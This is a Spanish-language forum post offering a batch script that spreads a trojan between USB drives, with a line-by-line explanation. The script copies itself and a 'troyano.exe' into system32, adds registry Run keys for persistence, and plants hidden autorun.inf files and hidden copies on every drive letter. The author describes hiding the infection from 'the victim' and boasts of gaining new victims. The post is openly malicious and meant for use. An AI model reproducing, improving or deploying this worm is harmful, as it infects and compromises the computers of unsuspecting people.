Propagar de USB a USB un codigo malicioso con un simple batch

Hola amigos, bueno aca les paso el codigo que escribi en batch es sencillo pero efectivo por lo menos a mi me funciona bien 
yo lo uso para propagar un troyano por medio de discos removibles. 
funciona de la siguiente manera: al conectar un ped driver o cualquier medio removible el codigo se copiara en el para luego ejecutarse en la proxima 
maquina donde se conecte. 
en el codigo van a apareser dos .exe esos son "propagador.exe" despues le cambias el nombre que vos quieras, y "troyano.exe" ese sera tu codigo malisioso que quieres propagar. 
lo unico que vas a nesecitar es un compilador para pasar tu .bat a .exe, yo use "Bat To Exe Converter" que seguro buscando un poco lo encuentran y cumple my bien esa funcion. 

bueno pongo el codigo y lo explico un poco: 

--------------------------------------------------------------------------- ------------------------------------------------------------------- 

@echo off 
EXPLORER.EXE /E,\ 
:volver 
echo va a mirar si existe propagador.exe 
ping -n 15 localhost > nul 

IF NOT EXIST D:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST E:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST F:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST G:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST H:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST I:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST J:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST K:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST L:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST M:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST N:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST O:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST P:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST Q:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST R:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST S:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST T:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST U:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST V:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST W:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST X:/propagador.exe (GOTO NOEXISTE) 
IF NOT EXIST Y:Ypropagador.exe (GOTO NOEXISTE) 
IF NOT EXIST Z:/propagador.exe (GOTO NOEXISTE) 


IF EXIST D:/propagador.exe (GOTO volver) 
IF EXIST F:/propagador.exe (GOTO volver) 
IF EXIST G:/propagador.exe (GOTO volver) 
IF EXIST H:/propagador.exe (GOTO volver) 
IF EXIST I:/propagador.exe (GOTO volver) 
IF EXIST J:/propagador.exe (GOTO volver) 
IF EXIST K:/propagador.exe (GOTO volver) 
IF EXIST L:/propagador.exe (GOTO volver) 
IF EXIST M:/propagador.exe (GOTO volver) 
IF EXIST N:/propagador.exe (GOTO volver) 
IF EXIST O:/propagador.exe (GOTO volver) 
IF EXIST P:/propagador.exe (GOTO volver) 
IF EXIST Q:/propagador.exe (GOTO volver) 
IF EXIST R:/propagador.exe (GOTO volver) 
IF EXIST S:/propagador.exe (GOTO volver) 
IF EXIST T:/propagador.exe (GOTO volver) 
IF EXIST U:/propagador.exe (GOTO volver) 
IF EXIST V:/propagador.exe (GOTO volver) 
IF EXIST W:/propagador.exe (GOTO volver) 
IF EXIST X:/propagador.exe (GOTO volver) 
IF EXIST X:/propagador.exe (GOTO volver) 
IF EXIST Y:/propagador.exe (GOTO volver) 
IF EXIST Z:/propagador.exe (GOTO volver) 

:NOEXISTE 

echo no existe... seguimos 
ping -n 10 localhost > nul 
XCOPY opesys.exe "C:\WINDOWS\system32" /H/Y 
XCOPY troyano.exe "C:\WINDOWS\system32" /H/Y 

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v opesys /t REG_SZ /d C:\WINDOWS\system32\propagador.exe /f > nul 

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v msngms /t REG_SZ /d C:\WINDOWS\system32\troyano.exe /f > nul 


:bucle 
@echo off 
echo espera para crear inf y copiar de sys 
ping -n 10 localhost > nul 


FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (del %%A:\Autorun.inf) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (echo [Autorun] > %%A:\AutoRun.inf) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (echo action=Abrir >> %%A:\AutoRun.inf) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (echo shellexecute= propagador.exe >> %%A:\AutoRun.Inf) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (attrib +h +s %%A:\AutoRun.inf) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (attrib +h +s %%A:\propagador.exe)
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (attrib +h +s %%A:\troyano.exe) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (XCOPY "C:\WINDOWS\system32\propagador.exe" "%%A:" /H/Y) 
FOR %%A IN (D E F G H I J K L M N O P Q R S T U W X Y Z) DO (XCOPY "C:\WINDOWS\system32\troyano.exe" "%%A:" /H/Y) 
ping -n 10 localhost > nul 

goto volver 

--------------------------------------------------------------------------- ---------------------------------------------------- 
bueno la primera linea: EXPLORER.EXE /E,\ es para que cuando abras el disco removible se abra el explorador normalmente 
los echo los puse para ir probando ejecutando el .bat y ver como va funcionando en la ventana de DOS si quieren no lo pongan 
los ping -n 15 localhost > nul es para darle un tiempo a cada paso que va realizando el codigo, como para no tarar el equipo 
con IF NOT EXIST va a mirar en los discos a partir den D: hasta la Z:, si no existe el propagador.exe si es asi saltara hasta :NO EXISTE y prosedera a copiarlo en cada uno de estos. 
osea lo que tenemos que hacer es: en la raiz de un disco, puede ser el mismo removible. colocamos el "troyano.exe" y lo ponemos en modo oculto luego compilamos este codigo "propagador.bat" a "propagador.exe" con el programa: "Bat To Exe Converter" lo colocamos en la raiz junto al "troyano.exe" TAMBIEN EN MODO OCULTO cuando ejecutemos "propagador.exe" estos 2 se copiaran en: C:\WINDOWS\system32 , y de ahí se copiaran en modo oculto a todos los discos que reconozca la maquina desde el D: hasta la Z: tambien se creara en modo oculto el archivo "autorun.inf" que es el que va a ejecutar el gusano cada vez que hagamos doble clik en estos discos. 
las dos lineas de modificacion de registro son para ejecutar el gusano cada vez que se inicie el equipo 
podran ver que el codigo no ejecuta el troyano cuando se abre, esto es porque cada vez que se abriria el disco se estaria instalando y tardaria mucho tiempo la victima se daria cuenta que a la maquina le pasa algo. 
Si lo ejecuta al reiniciar el equipo a partir de ahi ya estara infectado con el troyano 
se propaga realmente muy rapido. 

cualquier critica, correccion o sugerencia sera bienvenida. 

bueno eso es mas o menos todo espero que les sirva a mi me han aparecido nuevas victimas seguro a ustedes tambien. 
cualquier cosa comenten chauu!